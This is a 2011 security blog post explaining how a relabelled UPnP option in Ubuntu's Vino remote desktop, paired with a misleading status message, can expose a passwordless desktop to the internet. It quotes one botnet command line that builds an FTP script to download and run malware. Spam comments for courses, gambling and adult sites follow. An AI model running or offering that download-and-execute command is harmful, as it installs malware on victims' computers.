Saturday, 12 November 2011

Accidentally opening the doors on Ubuntu



This post highlights how even a small modification to a graphical user interface can be responsible for causing unintended security problems.

When Ubuntu's remote desktop service (Vino) first introduced support for UPnP, this is what the Security section of new configuration dialog looked like:



The UPnP feature was activated by checking "Talk to the router and try to open the doors there". Although this label was criticised for sounding too informal, it did actually give a reasonable impression of what might happen if you checked the box. Namely, it used UPnP to configure the router such that the remote desktop service could be accessed from the internet.

However, this is what the option now looks like in the current Long Term Support version of Ubuntu (10.04.3 LTS, Lucid Lynx):



(This is a screenshot from a real victim of the problem I am about to describe)

Notice that this unfortunate user has enabled remote control of their desktop, with no password protection. What was possibly going through their mind?  Well, convenience, most likely. Indeed, the lack of password may not necessarily pose any security problems if the Ubuntu desktop is on a trusted network and not connected directly to the internet. This would be typical of many home networks, where internet access is usually provided by a NAT-enabled router.

But also notice that the UPnP option is now labelled "Configure network automatically to accept connections". The user has checked this box - after all, why wouldn't you want a connection to be accepted automatically? Convenience is the goal here, and there is nothing to suggest that this option really means "accept connections from the entire internet".

So, after checking the box, the user's UPnP-enabled router will start to accept connections from the internet on port 5900 and forward them to the Ubuntu desktop.  Even so, the settings dialog reassuringly and erroneously states that "Your desktop is only reachable over the local network." The combination of this bug and the slightly unclear option label has caused the user to accidentally open the doors on their Ubuntu desktop. To anyone.

Anybody in the world can now use this person's computer simply by using a VNC client to connect to the public-facing IP address of the router (no password required, of course).

Internet-facing VNC servers are often subjected to automated attacks from botnets, but vino-server's lack of connection logging might make these hard to trace after the event. Thankfully, most of the automated attacks happening right now are only designed to exploit Windows systems.  You may, for example, notice attacks similar to the following, which launch a command prompt and create a temporary FTP script named "ik", which is then used to download and execute malware:
cmd /c echo open example.com 21 >> ik &echo user xyz letmein >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned

The botnet simply connects to an exposed VNC server and sends these characters to the remote Windows computer.  Quite cheeky, but at least it has the decency to tell the user they got owned!

Are you affected by this? If you have enabled remote desktop or vino-server on any version of Ubuntu or Windows, you should probably double check that you haven't inadvertently exposed the service to the entire internet. If you do wish for the service to be internet visible, ensure that you use a suitably strong password and keep your server software up to date.

34 comments:

  1. That's why, if you fall into this category, you'll need someone to keep an eye on your kids wherever they are. The person you choose to take care of your children should be trustworthy and honest.security services in London We've heard of cases where caretakers liaise with kidnappers to abduct children. You don't want to fall victim to such a racket. UK Close Protection Services are specialists in child protection. When you hire us, we'll provide you with armed and unarmed bodyguards to protect your family against any harm or kidnap.

    ReplyDelete
  2. I’ve been busy writing my reports. Now, I don’t do it anymore thanks to this service. Go to their homepage. The majority of students are overwhelmed with homework. If you are one of them, click here 야동 .

    ReplyDelete
  3. "Can I simply just say what a relief to find a person that genuinely understands what they are talking about on the internet.
    You definitely know how to bring an issue to light and make it important.
    A lot more people ought to check this out and understand
    this side of your story. It's surprising you are not more popular because you definitely have the gift."

    오피

    ReplyDelete
  4. It’s remarkable to go to see this web site and reading the views of all mates about this paragraph, while I am also eager of getting know-how.

    마사지

    ReplyDelete
  5. I’m impressed, I must say. I’m here for the first time. Superb! I simply must tell you that I really love your blogs page. My boyfriend enjoys your blogs.
    건전마사지

    ReplyDelete
  6. Great post happy to see this. I thought this was a pretty interesting read when it comes to this topic Information. Thanks..
    Artificial Intelligence Course

    ReplyDelete
  7. Nice Post thank you very much for sharing such a useful information and will definitely saved and revisit your site and i have bookmarked to check out new things frm your post.
    Data Science Course

    ReplyDelete
  8. Thanks Your post is so cool and this is an extraordinary moving article and If it's not too much trouble share more like that.
    Digital Marketing Course in Hyderabad

    ReplyDelete
  9. Very great post which I really enjoy reading this and it is not everyday that I have the possibility to see something like this. Thank You.
    Best Online Data Science Courses

    ReplyDelete
  10. Actually I read it yesterday but I had some ideas about it and today I wanted to read it again because it is so well written.
    Data Scientist Course in Jaipur

    ReplyDelete
  11. Very good message. I stumbled across your blog and wanted to say that I really enjoyed reading your articles. Anyway, I will subscribe to your feed and hope you post again soon.
    Data Scientist Course in India

    ReplyDelete
  12. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work thank you.
    Cloud Computing Training in Bangalore

    ReplyDelete
  13. This comment has been removed by the author.

    ReplyDelete
  14. Excellently written article, if only all bloggers offered the same level of content as you, the internet would be a much better place. keep up the good work.
    Mlops Training

    ReplyDelete
  15. Thanks for such a great post and the review, I am totally impressed! Keep stuff like this coming.
    Mlops Course

    ReplyDelete
  16. This is definitely one of my favorite blogs. Every post published did impress me.
    Mlops Training

    ReplyDelete
  17. Very informative Blog! There is so much information here that can help thank you for sharing.
    Data Science Training in Lucknow

    ReplyDelete
  18. 스포츠토토티비
    스포츠중계

    This is a lovely post. I really appreciate your optimism and I agree with your post and looking forward for more post from you..

    ReplyDelete
  19. I think this is a really good article. You make this information interesting and engaging. Thanks for sharing.
    Data Science Training in Jalandhar

    ReplyDelete
  20. Really nice and interesting post. I was looking for this kind of information and enjoyed reading this one. Thanks for sharing.
    Data Science Training in Indore

    ReplyDelete
  21. I think this is a really good article. You make this information interesting and engaging. Thanks for sharing.
    Data Science Course in India

    ReplyDelete
  22. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work thank you.
    Business Analytics Course in Chandigarh

    ReplyDelete
  23. Give the privilege of being a member until it makes people who are interested are widespread and come to apply for membership on the web without interruption. Don't hesitate to apply for membership today. Million dollar slots are waiting for you. Ak88king

    ReplyDelete
  24. Hit on a Soft 17 - A lot of players make this mistake because of|as a end result of} the general rule is to Stand on Hard 17. However on a Soft 17 , the Ace makes all of the difference. When you 우리계열 imagine that your whole will beat the dealer's whole. "Change please" - This is a method of asking the dealer to transform your cash into taking part in} chips.

    ReplyDelete
  25. Rely on the Best Local SEO services in India by Divine Soft Technology and get stay on the top of the search results. Ours is an SEO company in Delhi that works to get you prominence online.

    ReplyDelete
  26. Thanks for bringing alert to readers especially ubuntu users. Small changes will make much difference coding related OS such as Ubuntu. It's really nice to bring this beautiful article for us. Thanks for sharing and keep sharing more related blogs. Traffic Lawyer Alleghany Virginia

    ReplyDelete
  27. Thanks for sharing this wonderful blog. Best CRM Software for Marketing in 2023

    ReplyDelete
  28. I always looking for a blog that is related to my problem and then I found this. Fence Company Spring Hill, FL

    ReplyDelete
  29. are you the same guy who wrote IRC Hacks? it's my favourite book for bedtime reading <3

    ReplyDelete